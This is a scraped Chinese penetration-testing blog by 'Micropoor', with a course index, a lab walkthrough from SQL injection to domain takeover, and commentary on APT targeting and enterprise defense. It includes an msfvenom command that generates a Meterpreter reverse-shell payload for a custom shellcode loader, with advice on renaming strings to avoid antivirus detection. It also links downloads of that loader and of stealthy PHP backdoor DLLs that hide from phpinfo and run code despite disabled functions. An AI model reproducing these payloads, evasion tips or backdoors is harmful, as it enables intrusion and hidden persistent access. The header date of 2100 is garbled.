2100年12月29日星期三

为什么会有这个博客

渗透攻击超十年,由于年龄,身体原因,自己感觉快要退出一线渗透攻击了。遂打算把毕生所学用文字表写出来。因为文章涉及到敏感的攻击行为,所以好多需要打马赛克,或者是本地以demo的形式表现出来。当这个行业做久了,你也终有一天发现原来事物的本质是如此重要。比如内网渗透的本质是信息搜集。当年某大佬把这条经验传递给我,同样,今天变成老家伙的我,也希望把这条经验传递下去。
文中一定会出现笔误或者不对的地方,请大家多多包涵,提前向各位说声对不起,所有课程从基础开始(包括工具的介绍,应用等),这样以后新来的同学或者想要自我从头学习的同学也可以避开一些弯路,在写的过程中,我深深体会到分享者才是学习中的最大受益者,由于需要成文章,所以需要查阅大量的资料。在整个过程中,又学习到很多知识点。连载其中包括穿插在工作中的项目心得笔记,包括但不限制于代码审计,web渗透,内网渗透,域渗透,隧道介绍,日志溯源与暴力溯源等。如果有课程指定需求介绍相关技术的同事(在我技术能力范围之内),请发我的邮箱:micropoor@gmail.com,由于博客可能非人为因素被停止更新,本博客所有的文章都转自我的另一个博客https://micropoor.blogspot.com。
在2010-2012年之间一直在写<PHP安全新闻早8点>,但是由于当时的工作原因,就不在写了。我于2011年离开这个圈子,到另一个圈子,于2016年末回归到这个圈子,发现这个圈子的精神变了,或者我跟不上潮流了,或者我掉队了。可能技术一旦与钱挂钩,技术可以快速变现的时候,那么它的味道就会变吧。这次的所有课程无版权,只希望自己可以在本来已封闭的技术氛围里,依然做出一些技术文档输出。那么这次的教程我想依然想叫<PHP安全新闻早8点>



2017-11-17
Micropoor

2019年1月21日星期一

Micropoor_shellcode for payload backdoor


Micropoor_shellcode:

Usage:

Micropoor_shellcode  port host

E.g

Micropoor_shellcode.exe 4444 192.168.1.5

Generate payload:

msfvenom  -p windows/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=53 -b '\x00' -f c |grep -v unsigned|sed "s/\"\\\x//g"|sed "s/\\\x//g"|sed "s/\"//g"|sed ':a;N;$!ba;s/\n//g'|sed "s/;//g"

copy shellcode to Micropoor_box.rb








Micropoor_shellcode_x64.exe:
大小: 136192 字节
修改时间: 2019122, 4:40:59
MD5: 304F3C23AD6C57714EDB73D93DA6813D
SHA1: 63B213272AADA91A44F965741E3720EE25CAF7C9
CRC32: 4C2FDE0A
https://drive.google.com/open?id=14HapmSXQtb-HpnXeO3MUEf2utwKfkhOa

Micropoor_shellcode_x86.exe:
大小: 117248 字节
修改时间: 2019122, 2:45:50
MD5: D91444F0A632DEE7F57BAE432CEFFAEC
SHA1: 3D5135FE30FBEFD090B6BBB1F7738DB25B0C2CCC
CRC32: 02BE2833
https://drive.google.com/open?id=15GqGl5KgfVpEkCBItrmqddpDxmXzFG6m

Micropoor_shellcode.rb
大小: 956 字节
修改时间: 2019122, 3:13:17
MD5: 9A82AB2C3A39CABC26FC68864DB07BA1
SHA1: 92D6253C88BA10073CD3AAEE8C38C366DFC7761F
CRC32: 97FA3861
https://drive.google.com/open?id=17uv2Mszu4et3Co1HWQ50mMZiPCL7Ku9F

目前搜集问题总结:

问题1:程序崩溃:
           shellcode分离加载器分为x86,x64,版本。请对应相关的Micropoor_shellcode.exe。
这里需注意,msfvenom的payload其中windows/messagebox,是分x64与x86的,只是msfvenom本身仅提供了x86版本的shellcode。所以如果需运行messagebox,需要调用Micropoor_shellcode_x86.exe。
           程序崩溃2:
           如果生成x86或者x64的shellcode,那么msf本身请对应相关位数的payload。

问题2:被查杀:
           了解用法后,请去掉Micropoor的字符串字样,或者更改其他字符串即可。
         




2019年1月4日星期五

PHP安全新闻早8点课程系列

     文中一定会出现笔误或者不对的地方,请大家多多包涵,提前向各位说声对不起,所有课程从基础开始(包括工具的介绍,应用等),这样以后新来的同事或者想要自我从头学习的同事也可以避开一些弯路,在写的过程中,我深深体会到分享者才是学习中的最大受益者,由于需要成文章,所以需要查阅大量的资料。在整个过程中,又学习到很多知识点。连载其中包括穿插在工作中的项目心得笔记,包括但不限制于代码审计,web渗透,内网渗透,域渗透,隧道介绍,日志溯源与暴力溯源等。如果有课程指定需求介绍相关技术的同事(在我技术能力范围之内),请发我的邮箱:micropoor@gmail.com
     在2010-2012年之间一直在写<PHP安全新闻早8点>,但是由于当时的工作原因,就不在写了。这次的所有课程无版权,只希望自己可以在本来已封闭的技术氛围里,依然做出一些技术文档输出。那么这次的教程我想依然想叫<PHP安全新闻早8点>,笔者相信有一天,你会发现原来弄清事物的本质是这样的有趣。






2017-11-17
Micropoor

动态:
          更新第十八课内容以及链接,2019-1-21
          暂停更新,文章核心全部围绕企业安全防御,预警为出发点。2019-1-25
          更新第二十一课至第二十六课内容以及链接,2019-2-4
          如有指定技术需求,请在系列中留言,会在未来课时中更新该相关技术文章。2019-2-18
          更新完毕第一章:生(100课时),点我下载。2019-2-18





第一章:


1-10课:
第一课:windows提权-快速查找exp
第二课:Linux提权-依赖exp篇
第三课:Delphi代码审计--项目实战1
第四课:Asp代码审计--项目实战2
第五课:工具介绍-Sqlmap
第六课:反攻的一次溯源--项目实战3
第七课:sql server 常用操作远程桌面语句
第八课:模拟诉求任务攻击
第九课:工具介绍-the-backdoor-factory
第十课:msfvenom常用生成payload命令

11-20课:
第十一课:工具介绍Veil-Evasion
第十二课:基于UDP发现内网存活主机
第十三课:基于ARP发现内网存活主机
第十四课:基于第十课补充payload1
第十五课:基于第十课补充payload2
第十六课:红蓝对抗渗透测试1
第十七课:红蓝对抗渗透测试2
第十八课:红蓝对抗渗透测试3
第十九课:基于netbios发现内网存活主机
第二十课:基于snmp发现内网存活主机

21-30课:
第二十一课:基于ICMP发现内网存活主机
第二十二课:基于SMB发现内网存活主机
第二十三课:基于MSF发现内网存活主机第一季
第二十四课:基于MSF发现内网存活主机第二季
第二十五课:基于MSF发现内网存活主机第三季
第二十六课:基于MSF发现内网存活主机第四季
第二十七课:基于MSF发现内网存活主机第五季
第二十八课:基于MSF发现内网存活主机第六季
第二十九课:发现目标WEB程序敏感目录第一季
第三十课:解决msfvenom命令自动补全

31-40课:
第三十一课:msf的前生今世
第三十二课:配置vps上的msf
第三十三课:攻击Mysql服务
第三十四课:攻击Sql server 服务
第三十五课:与Sqlmap结合攻击
第三十六课:解决vps上ssh掉线
第三十七课:vbs一句话下载payload
第三十八课:certutil一句话下载payload
第三十九课:vbs一句话下载payload补充
第四十课:ftp一句话下载payload

41-50课:
第四十一课:bitsadmin一句话下载payload
第四十二课:攻击FTP 服务
第四十三课:js一句话下载payload
第四十四课:certutil一句话下载payload补充
第四十五课:解决bat一句话下载payload黑窗
第四十六课:powershell一句话下载payload
第四十七课:payload分离免杀思路
第四十八课:payload分离免杀思路第二季
第四十九课:关于Powershell对抗安全软件
第五十课:基于SqlDataSourceEnumerator发现内网存活主机

51-60课:
第五十一课:项目回忆:体系的本质是知识点串联
第五十二课:渗透的本质是信息搜集
第五十三课:内网渗透中的文件传输
第五十四课:基于Powershell做Socks 4-5代理
第五十五课:与Smbmap结合攻击
第五十六课:离线提取目标机hash
第五十七课:高级持续渗透-第一季关于后门
第五十八课:高级持续渗透-第二季关于后门补充一
第五十九课:高级持续渗透-第三季关于后门补充二
第六十课:高级持续渗透-第四季关于后门

61-70课:
第六十一课:高级持续渗透-第五季关于后门
第六十二课:高级持续渗透-第六季关于后门
第六十三课:高级持续渗透-第七季demo的成长
第六十四课:高级持续渗透-第八季demo便是远控
第六十五课:离线提取目标机hash补充
第六十六课:借助aspx对payload进行分离免杀
第六十七课:meterpreter下的irb操作第一季
第六十八课:基于Ruby内存加载shellcode第一季
第六十九课:渗透,持续渗透,后渗透的本质
第七十课:ftp一句话下载payload补充

71-80课:
第七十一课:基于白名单Msbuild.exe执行payload第一季
第七十二课:基于白名单Installutil.exe执行payload第二季
第七十三课:基于白名单Regasm.exe执行payload第三季
第七十四课:基于白名单Regsvcs.exe执行payload第四季
第七十五课:基于白名单Mshta.exe执行payload第五季
第七十六课:基于白名单Compiler.exe执行payload第六季
第七十七课:基于白名单Csc.exe执行payload第七季
第七十八课:基于白名单Msiexec执行payload第八季
第七十九课:基于白名单Regsvr32执行payload第九季
第八十课:基于白名单Wmic执行payload第十季

81-90课:
第八十一课:基于白名单Rundll32.exe执行payload第十一季
第八十二课:基于白名单Odbcconf执行payload第十二季
第八十三课:基于白名单PsExec执行payload第十三季
第八十四课:基于白名单Forfiles执行payload第十四季
第八十五课:基于白名单Pcalua执行payload第十五季
第八十六课:基于白名单Msiexec执行payload第八季补充
第八十七课:基于白名单Cmstp.exe执行payload第十六季
第八十八课:基于白名单Ftp.exe执行payload第十九季
第八十九课:基于白名单Url.dll执行payload第十七季
第九十课:基于白名单zipfldr.dll执行payload第十八季

91-100课:
第九十一课:从目标文件中做信息搜集第一季
第九十二课:实战中的Payload应用
第九十三课:与CrackMapExec结合攻击
第九十四课:基于实战中的small payload
第九十五课:基于portfwd端口转发
第九十六课:HTTP隧道ABPTTS第一季
第九十七课:MSF配置自定义payload控制目标主机权限
第九十八课:HTTP隧道reGeorg第二季
第九十九课:HTTP隧道Tunna第三季
第一百课:HTTP隧道reDuh第四季


第二章:


101-110课:
第一百零一课:基于SCF做目标内网信息搜集第二季
第一百零二课:对抗权限长期把控-伪造无效签名第一季
第一百零三课:Http加密隧道下的横向渗透尝试---klion
第一百零四课:Windows Smb 欺骗重放攻击利用---klion
第一百零五课:windows 单机免杀抓明文或hash [通过dump lsass进程数据]---klion
第一百零六课:windows 单机免杀抓明文或hash [通过简单混淆编码绕过常规静态检测]---klion
第一百零七课:跨平台横向移动 [ windows计划任务利用 ]---klion
第一百零八课:跨平台横向移动 [wmi利用]---klion
第一百零九课:依托 metasploit 尽可能多的发现目标内网下的各类高价值存活主机---klion
第一百一十课:窃取,伪造模拟各种windows访问令牌[token利用]---klion

111-120课:
第一百一十一课:内网mssql完整利用流程 [ 基础篇 ]---klion
第一百一十二课:利用Dropbox中转C2流量---klion
第一百一十三课:COM Hijacking---倾旋
第一百一十四课:渗透沉思录
第一百一十五课:使用CrackMapExec 进行 NTLM Hash传递攻击---倾旋
第一百一十六课:Windows域渗透 - 用户密码枚举---倾旋
第一百一十七课:Windows 本地特权提升技巧---倾旋
第一百一十八课:CVE-2017-11882钓鱼攻击---倾旋

121-130课:
第一百二十一课:http加密代理深度应用 [ abptts ]---klion
第一百二十二课:利用 ssh隧道实现内网断网机meterpreter反向上线---klion
第一百二十三课:利用ssh隧道将公网meterpreter弹至本地的msf中---klion

131-140课:

141-150课:

151-160课:

161-170课:

171-180课:

181-190课:

191-200课:


第三章:


201-210课:

211-220课:

221-230课:

231-240课:

241-250课:

251-260课:

261-270课:

271-280课:

281-290课:

291-300课:


第四章:




高级持续渗透-第八季demo便是远控

2018年9月5日星期三

渗透,持续渗透,后渗透的本质

转载请标注作者Micropoor以及文章来源,https://micropoor.blogspot.com/。
引言(1):
        目标资产信息搜集的广度,决定渗透过程的复杂程度。
        目标主机信息搜集的深度,决定后渗透权限持续把控。
        渗透的本质是信息搜集,而信息搜集整理为后续的情报跟进提供了强大的保证。
        持续渗透的本质是线索关联,而线索关联为后续的攻击链方提供了强大的方向。
        后渗透的本质是权限把控,而权限把控为后渗透提供了以牺牲时间换取空间强大基础。

靶机背景介绍:


主机A1:CentOs x64 全补丁,无提权漏洞,可互联网
主机A2:Windows 2008 x64 全补丁  无提权漏洞,脱网机
主机B:  Windows 2008 x64 全补丁  无提权漏洞,域内主机,脱网机
主机C:  Windows 2008 x64 域控,存在ms14-068漏洞,脱网机
且A1,A2,B,C系统主机密码均为强口令

A1,A2,B,C为标准ABC类网,允许访问流程,A1---->A2---->B---->C,不允许跨主机访问。(请注意每个主机的对应IP段)

整体攻击流程图:

模拟开始攻击:

扫描主机A1对攻击机开放端口:80,22


扫描主机A1-Web目录结构:


主机A1-Web搜索处存在sql注入:


登录后台得到shell:


生成tcp payload 以php一句话执行:



A1对内信息搜集发现A2,并且针对A1,没有可用提权漏洞(Web非root权限),放弃提权:


以A1作为跳板添加虚拟路由,并且开始做针对A2的对内信息搜集:



以A1跳板发现A2部署weblogic,并且存在漏洞。转发目标机7001至本地,利用漏洞。




发现A2全补丁,放弃提权,(weblogic为user权限)对内信息刺探A2,得到weblogic相关配置文件,解密后,得到密码。


尝试做二级跳板,以weblogic相关配置,尝试对B(域内成员)的渗透(SMB)



获取B权限(system),尝试对内B的本身信息搜集,发现域账号(普通成员)user1.


引言(2):
          渗透测试过程,提权是非核心任务,这里也不建议尝试提权,因为在实战过程中获取某个“点”的权限,过程是及其漫长以及困难的,不要因为某个大胆的尝试,而影响了整个渗透测试流程。


尝试三级跳板,尝试获取sid,以及域控对内相关IP,尝试越权,获取域控权限。






并没有结束:在得到域控后,对主机C对内信息搜集,得到域控administrator密码,尝试用该密码ssh--->A1,成功,root权限。

广告(你需要背下来的广告词):只要是“一个人”设置的密码“群”,一定有大的规律,只要是“一个行业”设置的密码“群”一定有规律可寻。

引言(4):
       渗透的本质是信息搜集,而要把信息搜集发挥最大效果,一定是离不开“线索关联”,而信息搜集,无论是对内,对外,更或者是主动信息搜集,被动信息搜集。如何把目标A与B的信息搜集,整理后做“线索关联”是一个非常有趣的工作。

后者的话:
         APT攻击三大要素,既:
               攻击手段复杂,持续时间长,高危害性
         APT攻击主要分类为两大类,既:
                高级持续渗透 , 即时渗透





APT两大类攻击核心诉求区别:



在做调研之前,作者一直以为越发达的城市,或者越政治中心的城市是发生攻击的高发地,但是在调研后,打破了我之前的想法,于是作者深入调研原因究竟,以便更好的了解企业安全建设的规划。




      在针对政府机构的攻击中,APT组织除了会攻击一般的政府机构外,还有专门针对公检法的攻击。
       在针对能源行业的攻击中,APT组织重点关注的领域依次是:石油、天然气和核能。针对能源行业的攻击,对国家安全具有很大的影响。
       在针对金融行业的攻击中,APT组织最为关注的是银行,其次是证券、互联网金融等。还有部分APT组织会关注到与虚拟数字货币(如比特币、门罗币等)相关的机构或公司。针对金融机构的攻击大多会利用安全漏洞。针对ATM自动取款机的攻击也一直延续了2016年的活跃状态。
      还有一点值得注意:APT组织的攻击虽然具有很强的针对性,但其攻击目标也并不一定是单一的。有的APT组织只攻击特定国家特定领域的目标(仅从目前已经披露的情况看),但也有很多APT组织会对多个国家的不同领域目标展开攻击。上图给出了2017年全球各国研究机构发布的APT研究报告中,披露APT组织攻击目标的所属国家、领域数量分析。

引言(5):

         目前市场上的企业网络安全规划与建设大部分存在统一实施方案,或者是模板方案。而非针对特定行业,特定客户群体来制定针对方案。而不同行业,不同背景的企业安全规划方案也一定是不相同的。如传统行业(医药,食品,汽车)对待企业安全的建设是起跑阶段。如金融行业(证券,银行,保险)对待企业安全的建设是规划与实施阶段。如互联网行业(某度,某巴,某鹅)对待企业安全建设是自研或商业化阶段。为了更好的了解,所以如上制图,更能清楚的看到,未来企业网络安全对待企业发展的重要性,以及特定行业特定规划方案,特定行业特定防御对象。如某X企业安全预算为100万,是否应该针对该企业,行业,地理位置,做防御预算倾斜,并且留有10%-15%的资金量做2月,3月,11月攻击高发期的预案资金等。


总结:

         由于信息化,自动化的办公,企业成本的考虑,传统的“以点打面”的点会越来越分散与难以集中管理,如跨国办公,移动办公等。那么可预知的攻击方式将会以人为突破口的事越来越多。安全的本质又不能仅仅靠预算与设备的投入而杜绝,尤其是在未来的大型甲方公司,都会有着自己的安全团队,那么如何把网络安全发展成未来甲方公司的企业文化,将会是一个漫长的过程。而近些年无论是国内还是国外的官方部门开始重视网络安全,但是效果不明显,这里做一个总结,同样部分也适用于企业:


2018年5月27日星期日

优化更新 php backdoor for windows

所有Microdoor系列仅供学习,通过了解相关原理,来做自身安全与防护。切勿非法使用。

Microdoor for php 作为backdoor,更为隐蔽,所有调用以及代码任意执行,都调用内核函数,php禁用执行函数依然可以执行任意php代码。无缝连接菜刀,以及第三方渗透框架。并且在phpinfo,以及php -m 隐藏自身。旨意通过了解相关原理,做好相关安全防护。

更新支持php 5.4.x for windows
更新php-5.6.36 for windows 的部分bug。

php-5.6.36 backdoor for windows

micropoor_php5.6.x_x86.dll
SIZE: 188416 字节 MD5: 1EEF918B0D873316D39117F62C6A4819 SHA1: 944EFD5DB064FF412D1D7874FEC719F14382E2F1 CRC32: F9D03401
备注:micropoor_php5.6.x_x86.dll仅适用x32位php-5.6.36 for Windows 的Microdoor。不适用其他版本。
为防止原文件被篡改,使用前,请对比文件MD5值。
https://drive.google.com/file/d/19aJIIBKyTItUWkizGdupWJnHy7eUvrUC/view



php-5.4.x backdoor for windows

micropoor_php5.4.x_x86.dll
SIZE: 68608 字节 MD5: 457A72A45CBD06D8F4ECAB2C6A8B7426 SHA1: D922C4A9C79FB250F2BD0F426BD5124C38C9716E CRC32: 560188D7
备注:micropoor_php5.4.x_x86.dll仅适用x32位micropoor_php5.4.x_x86.dll for Windows 的Microdoor。不适用其他版本。
为防止原文件被篡改,使用前,请对比文件MD5值。
https://drive.google.com/file/d/1bIT9LSyeXxJa4qxKBYjPro784DEr3swG/view